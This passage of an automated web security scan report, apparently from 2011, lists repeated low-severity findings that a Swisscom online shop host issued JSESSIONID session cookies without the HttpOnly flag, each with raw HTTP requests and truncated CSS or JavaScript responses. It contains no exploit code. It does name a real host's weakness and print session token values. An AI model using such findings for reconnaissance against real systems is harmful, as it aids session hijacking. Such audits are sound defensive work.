}

18.60. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/CSS/IECssHacks.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/CSS/IECssHacks.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/CSS/IECssHacks.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:52:10 GMT
Set-Cookie: JSESSIONID=60DC1A5ACC6DEB467220ED00C69863B8; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:04:58 GMT
Accept-Ranges: bytes
ETag: "4c3a39264ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: text/css
Connection: close
Content-Length: 392

...ul
{
   margin-left: 0px;
   text-indent: 0px;
}

li
{
   padding-left: 12px;
   background-position: 2px 7px;
}

/* Subs and sups crunch text if line-height is not adjusted*/
sub, sup {
li
...[SNIP]...

18.61. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/CSS/Input.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/CSS/Input.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/CSS/Input.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:52:09 GMT
Set-Cookie: JSESSIONID=8F99E4A24A866AF1330051E62EE785D9; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:04:58 GMT
Accept-Ranges: bytes
ETag: "4c3a39264ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: text/css
Connection: close
Content-Length: 9761

/* Buttons */
       DIV.ButtonBox
       {
           height: 18px;
           min-width: 36px;
           cursor: pointer;
           font-weight: normal;
           position: relative;
           float: left;
       }
       
       DIV.ButtonBox A
       {
           f
...[SNIP]...

18.62. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/CSS/Layout.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/CSS/Layout.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/CSS/Layout.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:52:09 GMT
Set-Cookie: JSESSIONID=E850766DF48F258A7009966D3627BBCA; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:04:58 GMT
Accept-Ranges: bytes
ETag: "a69c3b264ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: text/css
Connection: close
Content-Length: 26017

*
{
margin: 0;
padding: 0;
}

body
{
   font-size: 12px;
   color: #555555;
   font-family: "Trebuchet MS" , Arial, Helvetica, Sans-Serif;
   line-height: 14px;
   margin: 0px 0px 0px 0px;

...[SNIP]...

18.63. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/CSS/Print.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/CSS/Print.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/CSS/Print.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:52:09 GMT
Set-Cookie: JSESSIONID=DC000D946636817823558DAC8F7062D5; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:04:58 GMT
Accept-Ranges: bytes
ETag: "0ff3d264ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: text/css
Connection: close
Content-Length: 1215

...@import "Layout.css";

/* Hide everything except logo from old header */
DIV.HeaderRight{display: none;}/* Do not hide ContentHeader. There's the logo in it. Just hide the links on the right */
...[SNIP]...

18.64. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/CSS/StyleSheet.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/CSS/StyleSheet.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/CSS/StyleSheet.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:52:09 GMT
Set-Cookie: JSESSIONID=2DB9B9CA8C05CA568800FE7B72F60913; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:04:58 GMT
Accept-Ranges: bytes
ETag: "a69c3b264ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: text/css
Connection: close
Content-Length: 12797

...TD.BoxConfigTableTitle
{
   color: #555555;
}


TD.BoxConfigTableTitlePurchase
{
   color: #002080;
   font-weight: bold;
   padding-top: 2px;
   padding-bottom: 2px;
   background-color: #CFDAFE;
...[SNIP]...

18.65. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/CSS/SubscriptionIE6.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/CSS/SubscriptionIE6.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/CSS/SubscriptionIE6.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:53:44 GMT
Set-Cookie: JSESSIONID=0DA2FB9254136CB09C792E81B3600958; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:04:58 GMT
Accept-Ranges: bytes
ETag: "4c3a39264ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: text/css
Connection: close
Content-Length: 2208

....Separator4Subscription
{
clear:both;
overflow: auto;
   background: transparent url(../App_Themes/Default/Layout/SeparatorbarSubscription.gif) repeat-y scroll left top;
}
.Separator4S
...[SNIP]...

18.66. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/CSS/smoothness/jquery-ui-1.8.4.custom.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/CSS/smoothness/jquery-ui-1.8.4.custom.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/CSS/smoothness/jquery-ui-1.8.4.custom.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:52:10 GMT
Set-Cookie: JSESSIONID=8169A387E37CEF753015376D443990A8; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:04:59 GMT
Accept-Ranges: bytes
ETag: "de3858264ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: text/css
Connection: close
Content-Length: 34497

/*
* jQuery UI CSS Framework @VERSION
*
* Copyright 2010, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
*
...[SNIP]...

18.67. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Include/Open3D.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Include/Open3D.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/Include/Open3D.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:52:15 GMT
Set-Cookie: JSESSIONID=B7ABAF1B8C81B1599A679B65D4E855D8; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:04:59 GMT
Accept-Ranges: bytes
ETag: "3ad2b2264ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Connection: close
Content-Length: 1837

function open3D(my3dFilename, myTitle, myVersion)
{
   var intLeft = screen.width/2-320;
   var intTop = screen.height/2-210;
   
   if (myVersion == "image")
   {
       var photo = window.open('/onlineshop
...[SNIP]...

18.68. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Include/hbx.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Include/hbx.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/Include/hbx.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:10 GMT
Set-Cookie: JSESSIONID=8FB38E20BFA0D51E3429D258D3454AF8; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:04:59 GMT
Accept-Ranges: bytes
ETag: "48f9b9264ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Connection: close
Content-Length: 15541

//hbx.js,HBX2.0,COPYRIGHT 1997-2006 WEBSIDESTORY,INC. ALL RIGHTS RESERVED. U.S.PATENT No.6,393,479B1 & 6,766,370. INFO:http://websidestory.com/privacy
/* INSERT CUSTOM EVENT CODE HERE */
// custom cod
...[SNIP]...

18.69. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Include/swfobject.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Include/swfobject.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/Include/swfobject.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:52:16 GMT
Set-Cookie: JSESSIONID=4216C82B36C5AD9CF141507AB4D86F0D; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:04:59 GMT
Accept-Ranges: bytes
ETag: "e06fb0264ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Connection: close
Content-Length: 7282

/**
* SWFObject v1.4: Flash Player detection and embed -
* http://blog.deconcept.com/swfobject/
*
* SWFObject is (c) 2006 Geoff Stearns and is released under the MIT License:
* http://www.o
...[SNIP]...

18.70. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Include/utils.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Include/utils.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/Include/utils.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:52:16 GMT
Set-Cookie: JSESSIONID=4A5F961CA530F6CCD24C246D19B87FAE; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:04:59 GMT
Accept-Ranges: bytes
ETag: "9434b5264ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Connection: close
Content-Length: 9443

...function AdjustVerticalBarHeight()
{
   var table = document.getElementById('divContent');
   var height = table.offsetHeight - 130;
   var separator;

   separator = document.getElementById('Separat
...[SNIP]...

18.71. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/Category/Category.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=3&lang=EN HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://en.swisscom.ch/residential
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:51:11 GMT
Set-Cookie: JSESSIONID=9C1CE7D6C83E6C0ED19CE872CAA1A725; Path=/
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 76582


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Fixed netw
...[SNIP]...

18.72. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/PagesShared/Include/s_code.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/PagesShared/Include/s_code.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/PagesShared/Include/s_code.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:27 GMT
Set-Cookie: JSESSIONID=3CBB188BD890F8B3E9669A10C30FCF65; Path=/
Cache-Control: max-age=18000
Last-Modified: Mon, 28 Mar 2011 09:12:40 GMT
Accept-Ranges: bytes
ETag: "b478a64928edcb1:27ce"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Connection: close
Content-Length: 38698

... /* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
var s = s_gi(s_account)
/*************************
...[SNIP]...

18.73. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pagesshared/Include/tracking_agency.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pagesshared/Include/tracking_agency.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/Pagesshared/Include/tracking_agency.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:29 GMT
Set-Cookie: JSESSIONID=05708EAF3FFB957CA1BD119F2A44A3E2; Path=/
Cache-Control: max-age=18000
Last-Modified: Thu, 14 Apr 2011 09:22:05 GMT
Accept-Ranges: bytes
ETag: "f045a76b85facb1:27ce"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Connection: close
Content-Length: 4897

/**
* Autor: Christopher Pleines (www.onsite-tuning.de)
*/

function cj_guidGenerator() {
var S4 = function() {
return (((1+Math.random())*0x10000)|0).toString(16).substring(1);
};

...[SNIP]...

18.74. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/ScriptResource.axd  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/ScriptResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/ScriptResource.axd?d=GLiewaofk-o43mLgLvUX_vkpWR89x3mNeKIGbASYu1WFedvbpSNY_NbCEptDak6fVBeCD3D9n_Mh4d8t2mrSynypy1cBZP00BNE-oxdZivx9VAatAHqqAxzgYYbSBsgm0&t=ffffffff867cc11a HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:53:48 GMT
Set-Cookie: JSESSIONID=C22813EE409E0EEF81110F21585227A2; Path=/
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Mon, 23 Apr 2012 02:52:40 GMT
Last-Modified: Sun, 24 Apr 2011 02:52:40 GMT
Content-Type: application/x-javascript;charset=utf-8
Connection: close
Content-Length: 78419

// Name: MicrosoftAjaxWebForms.debug.js
// Assembly: System.Web.Extensions
// Version: 3.5.0.0
// FileVersion: 3.5.30729.196
//-------------------------------------------------------
...[SNIP]...

18.75. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Scripts/jquery-1.4.2.min.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Scripts/jquery-1.4.2.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/Scripts/jquery-1.4.2.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:53:49 GMT
Set-Cookie: JSESSIONID=D391D39F297EB18326824CA83C623A0D; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:00 GMT
Accept-Ranges: bytes
ETag: "2ee23274ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Connection: close
Content-Length: 72174

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

18.76. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Scripts/jquery-ui-1.8.4.custom.min.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Scripts/jquery-ui-1.8.4.custom.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/Scripts/jquery-ui-1.8.4.custom.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:53:57 GMT
Set-Cookie: JSESSIONID=BA9220712A9C6845DE2D23479699B507; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:00 GMT
Accept-Ranges: bytes
ETag: "88446274ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Connection: close
Content-Length: 202203

/*!
* jQuery UI 1.8.4
*
* Copyright 2010, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* http://docs.jquery.com
...[SNIP]...

18.77. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Scripts/jquery.ba-postmessage.min.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Scripts/jquery.ba-postmessage.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/Scripts/jquery.ba-postmessage.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:03 GMT
Set-Cookie: JSESSIONID=EB5553A77EC35960FD782C9148A93C26; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:00 GMT
Accept-Ranges: bytes
ETag: "88446274ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Connection: close
Content-Length: 1040

/*
* jQuery postMessage - v0.5 - 9/11/2009
* http://benalman.com/projects/jquery-postmessage-plugin/
*
* Copyright (c) 2009 "Cowboy" Ben Alman
* Dual licensed under the MIT and GPL licenses.
*
...[SNIP]...

18.78. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Scripts/jquery.base64.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Scripts/jquery.base64.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/Scripts/jquery.base64.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: swisscomonlineshop.sso.bluewin.ch

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:54:03 GMT
Set-Cookie: JSESSIONID=0280BEDC9CF78C7DCA2F81488E446A69; Path=/
Cache-Control: max-age=18000
Last-Modified: Wed, 23 Mar 2011 11:05:00 GMT
Accept-Ranges: bytes
ETag: "d47f1274ae9cb1:27ce"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Connection: close
Content-Length: 4549

   
   /**
    * jQuery BASE64 functions
    *
    *    <code>
    *        Encodes the given data with base64.
    *        String $.base64Encode ( String str )
    *        <br />
    *        Decodes a base64 encoded data.
    *        String
...[SNIP]...

18.79. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Scripts/jquery.cookie.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Scripts/jquery.cookie.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /onlineshop/Scripts/jquery.cookie.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
